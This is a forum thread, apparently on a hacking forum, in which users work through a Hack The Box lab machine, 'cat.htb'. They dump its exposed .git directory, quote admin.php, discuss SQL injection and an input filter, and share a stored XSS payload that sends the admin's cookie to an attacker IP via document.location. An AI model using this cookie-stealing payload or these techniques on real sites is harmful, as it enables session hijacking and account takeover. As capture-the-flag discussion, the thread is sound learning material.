Posts: 28
Threads: 0
Joined: Aug 2024
(Feb 01, 2025, 07:23 PM)0xdaniii Wrote: (Feb 01, 2025, 07:20 PM)oahofat Wrote: cat admin.php
<?php
session_start();
include 'config.php';
// Check if the user is logged in
if (!isset($_SESSION['username']) || $_SESSION['username'] !== 'axel') {
header("Location: /join.php");
exit();
}
how you got this
git dump This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 196
Threads: 31
Joined: Apr 2024
Feb 01, 2025, 07:29 PM
(This post was last modified: Feb 01, 2025, 07:30 PM by maggi.)
(Feb 01, 2025, 07:23 PM)0xdaniii Wrote: [quote="oahofat" pid='1051104' dateline='1738437653']
cat admin.php
<?php
session_start();
include 'config.php';
// Check if the user is logged in
if (!isset($_SESSION['username']) || $_SESSION['username'] !== 'axel') {
header("Location: /join.php");
exit();
}
how you got this
[/quote
Git dumper on the webpage
http://cat.htb/.git
Posts: 6
Threads: 0
Joined: Jan 2025
All cat submissions get passed to the admin for verification, so we might have too steal his cookie, but there’s also sql injection in accept_cat.php
Posts: 39
Threads: 2
Joined: Oct 2024
(Feb 01, 2025, 07:40 PM)greg_heffley Wrote: All cat submissions get passed to the admin for verification, so we might have too steal his cookie, but there’s also sql injection in accept_cat.php
yeah i know but still i can't able to bypass the verification
Posts: 231
Threads: 18
Joined: Jul 2023
Feb 01, 2025, 08:06 PM
(This post was last modified: Feb 01, 2025, 08:11 PM by cavour13.)
Guys i saw also
commit-meta.txt
2:author Axel <axel2017@gmail.com> 1725146774 +0000
3:committer Axel <axel2017@gmail.com> 1725146774 +0000
but seems to be xss .. don't know why ..
bypass can be done by sqlinj
Posts: 49
Threads: 0
Joined: Dec 2024
Feb 01, 2025, 08:20 PM
(This post was last modified: Feb 01, 2025, 08:21 PM by 0xbeef.)
(Feb 01, 2025, 08:06 PM)cavour13 Wrote: Guys i saw also
commit-meta.txt
2:author Axel <axel2017@gmail.com> 1725146774 +0000
3:committer Axel <axel2017@gmail.com> 1725146774 +0000
but seems to be xss .. don't know why ..
bypass can be done by sqlinj
Yeah i guess that how we can get axel cookie. But all inputs are protected with some forbidden_patterns $forbidden_patterns = "/[+*{}',;<>()\\[\\]\\/\\:]/";
Trying to do some SQLi there in the contest.php This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 27
Threads: 0
Joined: Nov 2023
(Feb 01, 2025, 08:06 PM)cavour13 Wrote: Guys i saw also
commit-meta.txt
2:author Axel <axel2017@gmail.com> 1725146774 +0000
3:committer Axel <axel2017@gmail.com> 1725146774 +0000
but seems to be xss .. don't know why ..
bypass can be done by sqlinj
where is the SQLi? Is it inside of contest.php ? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 14
Threads: 0
Joined: Nov 2024
maybe an SQLi? cuz u can notice this part in content.php:
PHP Code: $forbidden_patterns = "/[+*{}',;<>()\\[\\]\\/\\:]/";
Posts: 2
Threads: 0
Joined: Jul 2024
Feb 01, 2025, 08:35 PM
(This post was last modified: Feb 01, 2025, 08:41 PM by Test09.)
<script>document.location='<http://10.10.x.x/?c='+document.cookie;</script> Xss in your username, you need to send request in the contest with random data
Posts: 43
Threads: 1
Joined: Oct 2023
(Feb 01, 2025, 08:35 PM)Test09 Wrote: <script>document.location='<http://10.10.x.x/?c='+document.cookie;</script> Xss in your username, you need to send request in the contest with random data
I registered user with the name
<script>document.location='http://10.10.14.14/?c='+document.cookie;</script>
and common password
and then was able to login as this user and contest valid cat.
so if no callback hence something wrong with the instance, or I missed some step?
|
